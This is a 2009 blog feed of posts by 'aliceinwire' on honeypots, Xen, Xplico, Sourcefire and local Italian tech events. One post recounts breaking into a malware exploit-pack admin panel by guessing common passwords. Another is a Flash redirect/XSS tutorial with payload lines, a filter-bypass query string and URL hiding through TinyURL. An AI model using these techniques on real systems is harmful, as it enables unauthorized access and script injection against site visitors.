src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8883384216711489720?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-79118501752785364212009-11-13T00:32:00.001-08:002009-11-13T00:32:39.908-08:00<p> In this day i have try some new cool technology that i love... </p> <p> Honeypot </p> <p> What they are? a honeypot is a fictional vulnerable system used to attract malicius software in the intent of use the fake bugs on the server and at the same time to grab information about the attacker and the technics used for attacks. A honeynet is a network of two or more honeypot. </p> <p> All the data retrived by a honeypot can be used for many reason, try to make a profile of the attacker, for research tring to steal the exploit and 0day stuff used by the attacker and know new vulnerability and can also be used in a legal procedure. </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/farms.jpg" alt="honeypot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/farms.jpg" height="315" width="422" /> </p> <p> The honeypot are divided in three level depending on how deep an attacker can interact with it </p> <p> Low interation are emulated by software and the interaction is really inconsistent </p> <p> medium interaction they are chrooted or jailed and provide a limited system access </p> <p> high interation the attacker can have full access on the server </p> <p> they are also classified on the data that they can collect </p> <p> Production can collect only limited information </p> <p>Research can collect more information about the attacker and the strumentation used for the attack, they are used for reasearch by goverment and military. </p> <p> Another version of honeypot are used for capture spammers giving fake smtp convicing the abuser that is a usable smtp relay for sending all sort of email when in fact is not and also can try to intercept the ip of the illegit user. </p> <p>Some honeypot can also try to assorb and reverse the malware when it try to attack the fake server for research analysing the binary file. </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/nep.bmp" alt="honeypot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/nep.bmp" height="507" width="628" /> </p> <p> Some honeypot software can be: </p> <p>Labrea is a tarpitting honeypot used for deceive the attacker scanner showing faking server with all port open in the unused network ip web adress for tarpitting but this can be useless with multithreading scanners. </p> <p> Nepenthes is a good botnet detector and tracker and can also try to reverse the binary file and shellcode </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/nepenthes-logo.png" alt="honeypot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/nepenthes-logo.png" /> <img src="http://drunkgeisha.noblogs.org/gallery/5829/nep2.jpg" alt="honeypot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/nep2.jpg" height="527" width="518" /> </p> <p> Dionaea the successor of nepenthes developed by the same team http://dionaea.carnivore.it/ and is a part of the google summer code. </p> <p>Honeyd is a small daemon need for create virtual hosts on a network. this virtual host created can be configured for attract intruder of specific vulnerability. </p> <p> For make a honeypot work you have to be really patient !!! and wait... </p> <p> a intruder can take lot of time before try to compromise it. </p> <p> The best is to have a firewall and other security tools for have the most possible data and information about the intrusion. </p> <p> </p> <p> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7911850175278536421?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-28201783462659191842009-11-13T00:31:00.000-08:002009-11-13T00:32:08.603-08:00<p> <b>Liberty Exploit System</b><br />latest: 1.0.5<br /><br />exploits:<br />MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit<br />PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon()<br />Flash 9<br />MS DirectShow<br />Snapshot<br />Java 0day<br /><br />price: 500$ </p> <p> </p> <p> Yesterday i was looking for this packet of exploits called Liberty pack. </p> <p> So it was really interesting and more interesting when i have found that the default username and password is user and pass ... </p> <p> so i have search in malwareurl for a cpanel admin.php of liberty pack... </p> <p> the first panel found i had try user and pass for login but don't work so i think that also the utilizator of liberty pack know now that leave the default password is insecure. </p> <p> So i have try the most common passwords = 1234,god,password and... it work!!! </p> <p> Now i have the access to the liberty pack cpanel </p> <p> it looks nice but not so nice for a 500$ exploit pack, is the essential for make it work... </p> <p> <b><br /></b> </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Browsers.png" alt="liberty exploit packs" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Browsers.png" height="372" width="509" /> </p> <p> Ok is not really big, i have see some other of 15k uniques visits but is not bad </p> <p> It inject for the most in ie7 and old ie version </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Countrys%202.png" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Countrys%202.png" height="585" width="498" /> </p> <p> </p> <p> The principal infected country is Turkey </p> <p> </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Systems.png" alt="liberty exploit packs" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Systems.png" height="422" width="577" /> </p> <p> </p> <p>The most infected OS is windows xp but there is also a strange Unknow system that i suspect to be some "crew" windows version like tinyxp or blackxp </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Referers%202.png" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Referers%202.png" height="405" width="578" /> </p> <p> This is one of the most interesting part the referreals </p> <p> looks like a turkish forum infected http://www.msxlabs.org/ </p> <p> naturally about windows stuff :D </p> <p> and also the other referreals are all forums </p> <p> (i suppose that the attacker inject in the post a invisible frame about the exploited page for infect other user of the forum) </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Exploits.png" alt="liberty exploit packs" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/Liberty%20-%20Exploits.png" height="192" width="567" /> </p> <p> Ok this is the exploit used for infect the users </p> <p> how i have find it... simple looking in the page source i have see a id=6 about exploits commented </p> <p> i have try to insert it in the admin page and i have see the redirection to the exploit page :D </p> <p> what that exploit number means ? <a href="http://www.microsoft.com/technet/security/Bulletin/ms06-014.mspx" mce_href="http://www.microsoft.com/technet/security/Bulletin/ms06-014.mspx">ms06-014</a> is a vulnerability in the microsoft data access components!!! </p> <p> id=4 reset the counter </p> <p> i have try to inject some code in the upload form but don't work for now... </p> <p> this are the files used by liberty pack </p> <pre style="margin-top: 0pt; display: inline;">site.com/index.php<br />site.com/download.pdf<br />site.com/Hidden.swf<br />site.com/update.php<br />site.com/update.exe<br />site.com/admin.php<br /></pre> <p> </p> <p> </p> <p> thanks everyone for listening </p> <p> </p> <p> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2820178346265919184?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-91362930982043615622009-11-13T00:30:00.002-08:002009-11-13T00:31:26.221-08:00<p> Hello everyone sorry for my absencebut i had lot stuff to do. </p> <p> today i talk about Jump/XSS/CSRF in Flash. </p> <p> The point of this tutorial is about build a redirect with flash jump </p> <p> For the start we need to use a precompiled swf </p> <p> <a href="http://drunkgeisha.noblogs.org/gallery/5829/fly.tar.gz" id="res_139037" title="test.swf test" mce_href="http://drunkgeisha.noblogs.org/gallery/5829/fly.tar.gz">fly.tar.gz</a> </p> <p> we have to upload the swf file to a webserver i had used altervista.org for it </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash01.png" alt="fly image screen shot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash01.png" height="345" width="451" /> </p> <p> than we have to make a file txt with the same name of the swf like test.swf and test.txt </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash1.png" alt="fly image screen shot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash1.png" height="279" width="466" /> </p> <p> now we have to edit the txt file </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash03.png" alt="fly image screen shot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash03.png" height="278" width="466" /> </p> <p> this are example of the edit of file .txt </p> <p> jump to http://drunkgeisha.noblogs.org<br />0,http://drunkgeisha.noblogs.org<br /><br />open window to http://drunkgeisha.noblogs.org<br />1,http://drunkgeisha.noblogs.org </p> <p> send GET Request to drunkgeisha.altervista.org<br />2,http://drunkgeisha.altervista.org/?hello<br /><br />send POST Request to drunkgeisha.altervista.org<br />3,http://drunkgeisha.altervista.org/?hello,,,str=string<br /><br />Call JavaScript<br />4,alert(/xss/) </p> <p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash09.png" alt="fly image screen shot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash09.png" height="121" width="375" /> </p> <p> now you have to try it </p> <p> for do it you need only to write in the browser </p> <p> test.swf?sec80=http://yoursite/test.txt </p> <p> this string may be better for bypass some filter </p> <p> test.swf?sec80=http://yoursite/test.txt&amp;80sec.swf </p> <p> if everythings is correct you can see this </p> <p><br /><img src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash05.png" alt="fly image screen shot" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/flyflash05.png" height="313" width="523" /> </p> <p> </p> <p> now you have to embed it on some page </p> <p> i have used tinyurl for obscure better the url http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt </p> <p><object height="344" width="425"><param name="movie" value="http://tinyurl.com/yhh5x7l"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://tinyurl.com/yhh5x7l" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="344" width="425"></embed></object> </p> <p> the result is this </p> <p> <a href="http://drunkgeisha.altervista.org/index.html" mce_href="http://drunkgeisha.altervista.org/index.html">http://drunkgeisha.altervista.org/index.html</a> </p> <p> and this on blogspot </p> <p> sorry for the bad quality but is my first tutorial video </p> <p> <img src="https://noblogs.org/js/tinymce/themes/advanced/images/spacer.gif" class="ltVideoYouTube" alt="http://www.youtube.com/v/ZE8gUY3uIIk" title="http://www.youtube.com/v/ZE8gUY3uIIk" height="350" width="450" /> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-9136293098204361562?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-31700454890672573852009-11-13T00:30:00.001-08:002009-11-13T00:30:50.224-08:00<p> <img src="http://drunkgeisha.noblogs.org/gallery/5829/programer.jpg" alt="programmer life" mce_src="http://drunkgeisha.noblogs.org/gallery/5829/programer.jpg" height="484" width="581" /> </p> <p> </p> <p> A good example of a programmer life </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3170045489067257385?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-47715450345381876162009-11-13T00:29:00.002-08:002009-11-13T00:30:18.472-08:00<p> In questi giorni sono stata assente perchè ho aiutato nell'riapertura del circolab :) </p> <p> </p> <p> http://www.circolab.net </p> <p> </p> <p> Cos'è il Circolab ? </p> <p> nemmeno noi sappiamo realmente cosa sia il Circolab !!! </p> <p> Da una recente discussione è risultato essere </p> <p> Un laboratorio/circolo informatico con il miglior bar di Brescia :D </p> <p> </p> <p> Cosa dice di noi il Brescia Oggi </p> <p> Domenica 25 Ottobre 2009 Ha riaperto il Circolab dove Internet è gratis.<br />Riapre questa sera con un aperitivo e un dj set dalle ore 19 il CircoLab, laboratorio di informatica libera nel quartiere Carmine. Nei locali di via Battaglie 29 è possibile trovare un Internet point gratuito, dove tutti i computer utilizzano Linux e gli attivisti organizzano corsi di informatica a livello base e avanzato (che partiranno prossimamente).<br />All'interno del circolo c'è un bar, sono organizzate proiezioni e si può ascoltare musica. Tra i progetti attivi c'è gnumerica.org, un server che offre caselle postali senza pubblicità, spazio web, mailing list.<br />GLI ATTIVISTI cercano di diffondere l'utilizzo consapevole delle tecnologie, in particolare di mettere in guardia chi utilizza i computer dalle insidie dei programmi e dei servizi commerciali.<br />«Aprire una casella di posta o una mailing list su gnumerica significa ad esempio non fornire i propri dati a società che potrebbero usarli con un secondo fine - afferma Marco «marcogh» Ghidinelli -; siamo tutti volontari e lo facciamo per passione».<br />Il Circolab è aperto dal giovedì al lunedì, dalle 17 alle 23:30, l'ingresso è riservato ai tesserati. FR </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4771545034538187616?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-70257757803649979332009-11-13T00:29:00.001-08:002009-11-13T00:29:35.458-08:00<p> GGD anche a brescia. </p> <p> Il 25 ottobre l'inaugurazione del gruppo GGD Brescia !!! </p> <p> Con gara di polpette !!! </p> <p> Dj set: </p> <p> Bio </p> <p> Algaritmo </p> <p> Aliceinwire </p> <p> </p> <p> Corsi di Linux </p> <p> </p> <p> Abbiamo anche <a href="http://www.facebook.com/pages/Girl-Geek-Dinners-Brescia/152680328248" target="_blank" mce_href="http://www.facebook.com/pages/Girl-Geek-Dinners-Brescia/152680328248">facebook </a> </p> <p> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7025775780364997933?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-28658059890548114872009-11-13T00:28:00.001-08:002009-11-13T00:28:58.322-08:00<table class="mceVisualAid" cellpadding="0" cellspacing="0" width="100%"> <tbody> <tr> <td class="mceVisualAid"><a href="http://www.facebook.com/group.php?gid=153474537933" id="thumbnail" target="_blank" mce_href="http://www.facebook.com/group.php?gid=153474537933"><img src="http://t3.gstatic.com/images?q=tbn:3FTrT_9b4i0rbM:http://www.dwaconsulting.com.br/blog/wp-content/uploads/2008/11/sourcefire.gif" alt="See full size image" mce_src="http://t3.gstatic.com/images?q=tbn:3FTrT_9b4i0rbM:http://www.dwaconsulting.com.br/blog/wp-content/uploads/2008/11/sourcefire.gif" height="58" width="150" /></a></td> </tr> </tbody> </table> <p> I'm happy to annunce the first <a href="http://www.facebook.com/group.php?gid=153474537933" target="_blank" mce_href="http://www.facebook.com/group.php?gid=153474537933">Sourcefire italian community</a> for support and discuss about security and similar stuff. </p> <p> Sourcefire is a fantastic product from the creator of Snort, it have a amazing web control panel with lot of widget and good ampliable capacity, it report all IDS /IPS event (also the most difficult to find) in the simply user interface web graphic dashboard. </p> <p style="text-align: center;"> <b>Login Screen<br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-login1.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-login1.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-login1.png" class="alignnone size-full wp-image-125" alt="sourcefire login1 Sourcefire" title="sourcefire-login1" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-login1.png" height="391" width="500" /></a> </b> </p> <p style="text-align: center;"> <b>Product “Home” Before Kristi</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-home.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-home.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-home.png" class="alignnone size-full wp-image-127" alt="sourcefire before home Sourcefire" title="sourcefire-before-home" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-home.png" height="296" width="500" /></a> </p> <p style="text-align: center;"> <b>Product “Home” After</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-home.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-home.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-home.png" class="alignnone size-full wp-image-128" alt="sourcefire after home Sourcefire" title="sourcefire-after-home" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-home.png" height="379" width="500" /></a> </p> <p style="text-align: center;"> <b>“Events” Before Kristi</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-events.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-events.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-events.png" class="alignnone size-full wp-image-129" alt="sourcefire before events Sourcefire" title="sourcefire-before-events" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-before-events.png" height="338" width="500" /></a> </p> <p style="text-align: center;"> <b>“Events” After</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-events.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-events.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-events.png" class="alignnone size-full wp-image-137" alt="sourcefire after events Sourcefire" title="sourcefire-after-events" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-after-events.png" height="376" width="500" /></a> </p> <p style="text-align: center;"> <b>Online Help (Customized for Each Product)</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-helpcenter.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-helpcenter.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-helpcenter.png" class="alignnone size-full wp-image-130" alt="sourcefire helpcenter Sourcefire" title="sourcefire-helpcenter" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-helpcenter.png" height="305" width="500" /></a> </p> <p style="text-align: center;"> <b>PDF Manual Cover (Easily Customized for Each Product)</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-manualcover.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-manualcover.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-manualcover.png" class="alignnone size-full wp-image-131" alt="sourcefire manualcover Sourcefire" title="sourcefire-manualcover" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-manualcover.png" height="647" width="500" /></a> </p> <p style="text-align: center;"> <b>Product Design Guide (PDG) for Developers</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-pdg.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-pdg.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-pdg.png" class="alignnone size-full wp-image-132" alt="sourcefire pdg Sourcefire" title="sourcefire-pdg" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-pdg.png" height="372" width="500" /></a> </p> <p style="text-align: center;"> <b>OEM Rebrand for Nortel – Login</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-login.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-login.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-login.png" class="alignnone size-full wp-image-133" alt="sourcefire nortel login Sourcefire" title="sourcefire-nortel-login" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-login.png" height="379" width="500" /></a> </p> <p style="text-align: center;"> <b>OEM Rebrand for Nortel – Home</b><br /><a href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-home.png" mce_href="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-home.png"><img src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-home.png" class="alignnone size-full wp-image-134" alt="sourcefire nortel home Sourcefire" title="sourcefire-nortel-home" mce_src="http://design-for-users.com/wp-content/uploads/2009/01/sourcefire-nortel-home.png" height="379" width="500" /></a><br /> </p> <p> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2865805989054811487?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-5725988514901075902009-11-13T00:25:00.000-08:002009-11-13T00:27:43.543-08:00I have installed Xen but i found this problem when i run virt-manager and i try to connect to Xen localhost:<br /><br />Unable to open a connection to the Xen hypervisor/daemon.<br /><br />Verify that:<br />- A Xen host kernel was booted<br />- The Xen service has been started<br /><br />Unable to open connection to hypervisor URI 'xen:///':<br /><class libvirterror=""> unable to connect to '/var/run/libvirt/libvirt-sock': Permission denied<br />Traceback (most recent call last):<br /> File "/usr/share/virt-manager/virtManager/connection.py", line 486, in _open_thread<br /> None], flags)<br /> File "/usr/lib/python2.5/site-packages/libvirt.py", line 99, in openAuth<br /> if ret is None:raise libvirtError('virConnectOpenAuth() failed')<br />libvirtError: unable to connect to '/var/run/libvirt/libvirt-sock': Permission denied<br /><br /><br />This is the solution that i have found:<br /><br />cd /etc/xen/<br /><br />and edit:<br /><br />xend-config.sxp<br /><br />activating this configuration:<br /><br />(xend-http-server yes)<br />(xend-unix-server yes)<br /><br /><br /><br />than reboot the computer and all goes right<br /><br />now im tring to add new vm ...<br /><br /><br /><br /> </class><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-572598851490107590?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-46833009085958845052009-10-06T07:08:00.000-07:002009-10-18T03:19:53.744-07:00Sorry for the few post in this day but im working in to much project at the same time :S<br /><br />I have try this xplico today and it work pretty good,it still need some fix , but it do the work.<br /><br />Ok for start you need to install Tcpdump and Xplico from your distribution installation command.<br />for dependance:<br /><br />apt-get install sqlite tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite0-dev libmysqlclient15-dev php5-cli python-all<br />(in the wiki version the l is missed in php5sqlite)<br /><br />if you have download the .deb you have only to give<br />dpkg -i name.deb<br /><br />if you have download the source code you have to give with root permission<br />make install<br /><br />for install the interface you need apache with rewrite, php5 and php5-sqlite<br />and put the file in your web server<br />usually /var/www/<br /><br />post_max_size = 100M<br />upload_max_filesize = 100M<br /><br />ok now for the live capture we have to give this command (and every time you need a new live caption)<br /><br />cd /opt/xplico/script/db/sqlite2<br />./create_xplico_db.sh<br /><br /><br /><br />At this time you only need to go at http://localhost:9876<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Zb07uqFW8vM/Sstdzo7asvI/AAAAAAAAASU/SwibGhmzJ_s/s1600-h/Screenshot-Xplico+..:Pols:..+-+Iceweasel.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 118px;" src="http://2.bp.blogspot.com/_Zb07uqFW8vM/Sstdzo7asvI/AAAAAAAAASU/SwibGhmzJ_s/s200/Screenshot-Xplico+..:Pols:..+-+Iceweasel.png" alt="" id="BLOGGER_PHOTO_ID_5389504520820273906" border="0" /></a><br /><br /><br /><br /><br /><br /><br />Insert the user and password write in the bottom and insert the capture id<br />when you have insert all id<br />you can run this:<br /><br />cd /opt/xplico/script<br />./rt_demo.sh<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/Sstht6uHacI/AAAAAAAAATE/d7tpizdbJMc/s1600-h/Screenshot-Terminal6.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 140px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/Sstht6uHacI/AAAAAAAAATE/d7tpizdbJMc/s200/Screenshot-Terminal6.png" alt="" id="BLOGGER_PHOTO_ID_5389508820563618242" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br />(in the source that i have download this script is copyrighted i hope the author can modify it with GPL2 because it need some modify for the tcpdump command in it)<br /><span style="color: rgb(204, 0, 0);">update:</span><br />I had received a mail from the author about this script when he said that in the neXt Release is all GPL !<br />Thanks for the fast replay :)<br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/SstgU6jrYfI/AAAAAAAAASc/NRikTinQyt0/s1600-h/Screenshot-Xplico+..:Sols:..+-+Iceweasel4.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 118px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/SstgU6jrYfI/AAAAAAAAASc/NRikTinQyt0/s200/Screenshot-Xplico+..:Sols:..+-+Iceweasel4.png" alt="" id="BLOGGER_PHOTO_ID_5389507291511480818" border="0" /></a><br /><br /><br /><br /><br /><br /><br />At this time is starting to retrive network packets and to catalogate it<br />You can also start to see the web packet retrived and other stuff<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SstgjZimN1I/AAAAAAAAASk/az5Xh5hiByA/s1600-h/Screenshot-Xplico+..:Webs:..+-+Iceweasel10.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 118px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SstgjZimN1I/AAAAAAAAASk/az5Xh5hiByA/s200/Screenshot-Xplico+..:Webs:..+-+Iceweasel10.png" alt="" id="BLOGGER_PHOTO_ID_5389507540346615634" border="0" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Zb07uqFW8vM/Ssthte1fNoI/AAAAAAAAAS8/mC5WCuZ3zEE/s1600-h/Screenshot-Xplico.org+-+View+topic+-+Next+version+0.6+release+date%3F+-+14.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 198px; height: 200px;" src="http://2.bp.blogspot.com/_Zb07uqFW8vM/Ssthte1fNoI/AAAAAAAAAS8/mC5WCuZ3zEE/s200/Screenshot-Xplico.org+-+View+topic+-+Next+version+0.6+release+date%3F+-+14.png" alt="" id="BLOGGER_PHOTO_ID_5389508813078345346" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsthMrBxgkI/AAAAAAAAASs/xQb0ODKQuYU/s1600-h/Screenshot-Xplico+..:Webs:..+-+11.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 118px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SsthMrBxgkI/AAAAAAAAASs/xQb0ODKQuYU/s200/Screenshot-Xplico+..:Webs:..+-+11.png" alt="" id="BLOGGER_PHOTO_ID_5389508249415418434" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br />You can read also Email<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsthYymSYPI/AAAAAAAAAS0/l3KevlANTMQ/s1600-h/Screenshot-Xplico+..:Emails:..+-+13.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 115px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SsthYymSYPI/AAAAAAAAAS0/l3KevlANTMQ/s200/Screenshot-Xplico+..:Emails:..+-+13.png" alt="" id="BLOGGER_PHOTO_ID_5389508457606045938" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><h3>Protocols Dissectors</h3> <table style="padding-left: 150px;" align="center" border="0"><tbody><tr align="center" bgcolor="white"> <td style="vertical-align: top;"><br /></td><th><br /></th> <th><br /></th> </tr> <tr><td style="vertical-align: top;"><br /></td><th align="center"> <table align="center" border="0" width="150"> <tbody><tr align="center"> <th> <h4>Dissector</h4> </th> <th> <h4>Status</h4> </th> <th> <h4>Note</h4> </th> </tr> <tr align="center"> <td>Ethernet</td> <td bgcolor="green">100%</td> <td>—</td> </tr> <tr align="center"> <td>PPP</td> <td bgcolor="green">90%</td> <td>—</td> </tr> <tr align="center"> <td>VLAN</td> <td bgcolor="green">95%</td> <td>—</td> </tr> <tr align="center"> <td>L2TP</td> <td bgcolor="#eecc11">70%</td> <td>—</td> </tr> <tr align="center"> <td>IPv4</td> <td bgcolor="green">98%</td> <td>—</td> </tr> <tr align="center"> <td>IPv6</td> <td bgcolor="green">98%</td> <td>—</td> </tr> <tr align="center"> <td>TCP</td> <td bgcolor="green">95%</td> <td>—</td> </tr> <tr align="center"> <td>UDP</td> <td bgcolor="green">100%</td> <td>—</td> </tr> <tr align="center"> <td>DNS</td> <td bgcolor="green">80%</td> <td>—</td> </tr> <tr align="center"> <td>HTTP</td> <td bgcolor="green">100%</td> <td>—</td> </tr> <tr align="center"> <td>SMTP</td> <td bgcolor="green">95%</td> <td>—</td> </tr> <tr align="center"> <td>POP</td> <td bgcolor="green">95%</td> <td>—</td> </tr> <tr align="center"> <td>IMAP</td> <td bgcolor="green">95%</td> <td>—</td> </tr> <tr align="center"> <td>SIP</td> <td bgcolor="green">80%</td> <td>—</td> </tr> <tr align="center"> <td>RTP</td> <td bgcolor="#eecc11">70%</td> <td>—</td> </tr> <tr align="center"> <td>RTCP</td> <td bgcolor="#eecc11">60%</td> <td>—</td> </tr> </tbody></table> </th> <th style="padding-left: 30px;" align="center"> <table align="center" border="0" width="190"> <tbody><tr align="center"> <th> <h4>Dissector</h4> </th> <th> <h4>Status</h4> </th> <th> <h4>Note</h4> </th> </tr> <tr align="center"> <td>SDP</td> <td 